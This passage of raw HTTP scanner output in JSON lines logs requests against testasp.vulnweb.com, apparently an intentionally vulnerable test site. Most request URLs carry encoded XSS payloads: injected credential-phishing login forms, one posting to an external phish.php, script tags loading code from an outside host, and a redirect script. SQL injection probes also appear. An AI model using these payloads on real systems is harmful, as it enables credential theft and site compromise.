Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":4035,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:14.229194111Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp\",\"time\":\"352.682022ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3897,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:14.237840895Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253E%253C%252Ftd%253E%253C\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253E%253C%252Ftd%253E%253C\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253E%253C%252Ftd%253E%253C\",\"time\":\"350.434616ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":4245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:14.240733666Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%25253\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%25253\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%25253\",\"time\":\"356.860683ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":4075,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:14.241002958Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Byour%2Bform%2Bfacebbok%2Bbelow%2Bbefore%2Bproceeding%3A%253Cform%2Baction%253D%2522http%3A%2F%2Fwww%2Evineyarddowntown%2Eorg%2Fpdf%2Fphish%2Ephp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%3A%253C%2Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253E%253C%2Ftd%253E%253C%2Ftr%253E%253Ctr%253E%253Ctd%253EPassword%3A%253C%2Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dpassword%253E%253C%2Ftd%253E%253C%2Ftr%253E%253C%2Ftable%253E%253Cinput%2Btype%253Dsubmit%2Bvalue%253DLOGIN%253E%253C%2Fform%253E\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Byour%2Bform%2Bfacebbok%2Bbelow%2Bbefore%2Bproceeding%3A%253Cform%2Baction%253D%2522http%3A%2F%2Fwww%2Evineyarddowntown%2Eorg%2Fpdf%2Fphish%2Ephp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%3A%253C%2Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253E%253C%2Ftd%253E%253C%2Ftr%253E%253Ctr%253E%253Ctd%253EPassword%3A%253C%2Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dpassword%253E%253C%2Ftd%253E%253C%2Ftr%253E%253C%2Ftable%253E%253Cinput%2Btype%253Dsubmit%2Bvalue%253DLOGIN%253E%253C%2Fform%253E\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Byour%2Bform%2Bfacebbok%2Bbelow%2Bbefore%2Bproceeding%3A%253Cform%2Baction%253D%2522http%3A%2F%2Fwww%2Evineyarddowntown%2Eorg%2Fpdf%2Fphish%2Ephp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%3A%253C%2Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253E%253C%2Ftd%253E%253C%2Ftr%253E%253Ctr%253E%253Ctd%253EPassword%3A%253C%2Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dpassword%253E%253C%2Ftd%253E%253C%2Ftr%253E%253C%2Ftable%253E%253Cinput%2Btype%253Dsubmit%2Bvalue%253DLOGIN%253E%253C%2Fform%253E\",\"time\":\"348.322763ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":4865,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:14.249887774Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cscript%2520src%3D%2522http%3A%2F%2Fsc0rn%2Ecom%2Fcfy%2Ejs%2522%253E%253C%252Fscript%253E\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cscript%2520src%3D%2522http%3A%2F%2Fsc0rn%2Ecom%2Fcfy%2Ejs%2522%253E%253C%252Fscript%253E\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cscript%2520src%3D%2522http%3A%2F%2Fsc0rn%2Ecom%2Fcfy%2Ejs%2522%253E%253C%252Fscript%253E\",\"time\":\"356.238649ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3821,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:14.251337953Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253E%253C%252Ftd%253E%253C%252Ftr%253E%253Ctr%253E%253Ctd%253EPassword%253A%253C%252Ftd%253E%253Ctd%253E%253Cinp\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253E%253C%252Ftd%253E%253C%252Ftr%253E%253Ctr%253E%253Ctd%253EPassword%253A%253C%252Ftd%253E%253Ctd%253E%253Cinp\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253E%253C%252Ftd%253E%253C%252Ftr%253E%253Ctr%253E%253Ctd%253EPassword%253A%253C%252Ftd%253E%253Ctd%253E%253Cinp\",\"time\":\"356.774004ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":4417,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:14.25496487Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cscript%2520src%3D%2522http%3A%2F%2Fsc0rn%2Ecom%2Fnip%2Ejs%2522%253E%253C%252Fscript%253E\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cscript%2520src%3D%2522http%3A%2F%2Fsc0rn%2Ecom%2Fnip%2Ejs%2522%253E%253C%252Fscript%253E\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cscript%2520src%3D%2522http%3A%2F%2Fsc0rn%2Ecom%2Fnip%2Ejs%2522%253E%253C%252Fscript%253E\",\"time\":\"349.715029ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3821,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:14.256163679Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cscript%2520src%3D%2522http%3A%2F%2Fsc0rn%2Ecom%2Fsc%2Ejs%2522%253E%253C%252Fscript%253E\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cscript%2520src%3D%2522http%3A%2F%2Fsc0rn%2Ecom%2Fsc%2Ejs%2522%253E%253C%252Fscript%253E\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cscript%2520src%3D%2522http%3A%2F%2Fsc0rn%2Ecom%2Fsc%2Ejs%2522%253E%253C%252Fscript%253E\",\"time\":\"343.390536ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3819,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:14.540305699Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%3D%253Cscript%253Elocation%2Ehref%3D%2522http%3A%2F%2Fgoo%2Egl%2Fz4LTEG%2522%3B%253C%252Fscript%253E\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%3D%253Cscript%253Elocation%2Ehref%3D%2522http%3A%2F%2Fgoo%2Egl%2Fz4LTEG%2522%3B%253C%252Fscript%253E\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%3D%253Cscript%253Elocation%2Ehref%3D%2522http%3A%2F%2Fgoo%2Egl%2Fz4LTEG%2522%3B%253C%252Fscript%253E\",\"time\":\"353.026695ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3837,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:14.599796373Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DMert\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DMert\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DMert\",\"time\":\"357.063072ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3643,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:14.627089278Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DMertXSS\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DMertXSS\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DMertXSS\",\"time\":\"347.948603ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3649,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:14.64896154Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3Ftfsearch%3Da\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3Ftfsearch%3Da\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FSearch%2Easp%3Ftfsearch%3Da\",\"time\":\"347.631196ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3637,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:14.671573509Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch.asp%3F\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch.asp%3F\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FSearch.asp%3F\",\"time\":\"342.509685ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3613,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:14.781870068Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml\",\"time\":\"352.085276ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3673,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:14.974990219Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize.asp%3Fitem%3Dhtml%2Fabout.html\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize.asp%3Fitem%3Dhtml%2Fabout.html\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FTemplatize.asp%3Fitem%3Dhtml%2Fabout.html\",\"time\":\"356.219873ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3673,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:15.022302243Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fsearch%2Easp%3FtfSearch%3D%253Cscript%253Ealert%281%29%26tfSearch%3Dalert%282%29%253C%2Fscript%253E\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fsearch%2Easp%3FtfSearch%3D%253Cscript%253Ealert%281%29%26tfSearch%3Dalert%282%29%253C%2Fscript%253E\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fsearch%2Easp%3FtfSearch%3D%253Cscript%253Ealert%281%29%26tfSearch%3Dalert%282%29%253C%2Fscript%253E\",\"time\":\"355.017995ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3781,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:15.026606705Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fsearch%2Easp%3FtfSearch%3D%253Cscript%253Ealert%281%29%3B%2520var%2520x%3D%5B%27%27%26tfSearch%3D%27%27%5D%3B%253C%2Fscript%253E\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fsearch%2Easp%3FtfSearch%3D%253Cscript%253Ealert%281%29%3B%2520var%2520x%3D%5B%27%27%26tfSearch%3D%27%27%5D%3B%253C%2Fscript%253E\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fsearch%2Easp%3FtfSearch%3D%253Cscript%253Ealert%281%29%3B%2520var%2520x%3D%5B%27%27%26tfSearch%3D%27%27%5D%3B%253C%2Fscript%253E\",\"time\":\"349.387596ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3839,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:15.036763163Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fsearch%2Easp%3FtfSearch%3D%253Cscript%253Ealert%281%29%3B%2520%2F%2F%26tfSearch%3D%253C%2Fscript%253E\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fsearch%2Easp%3FtfSearch%3D%253Cscript%253Ealert%281%29%3B%2520%2F%2F%26tfSearch%3D%253C%2Fscript%253E\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fsearch%2Easp%3FtfSearch%3D%253Cscript%253Ealert%281%29%3B%2520%2F%2F%26tfSearch%3D%253C%2Fscript%253E\",\"time\":\"355.915575ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3785,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:15.042665399Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0%2Band%2B1%3D1%2D%2D%255BTrue%255D\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0%2Band%2B1%3D1%2D%2D%255BTrue%255D\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0%2Band%2B1%3D1%2D%2D%255BTrue%255D\",\"time\":\"346.123222ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3699,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:15.047735398Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0\",\"time\":\"352.69645ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3631,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:15.087960535Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1\",\"time\":\"348.253642ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3631,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:15.14663098Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1%29%28%28%29%28%2E%2C%2C%27%22\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1%29%28%28%29%28%2E%2C%2C%27%22\",\"title\":\"acuforum 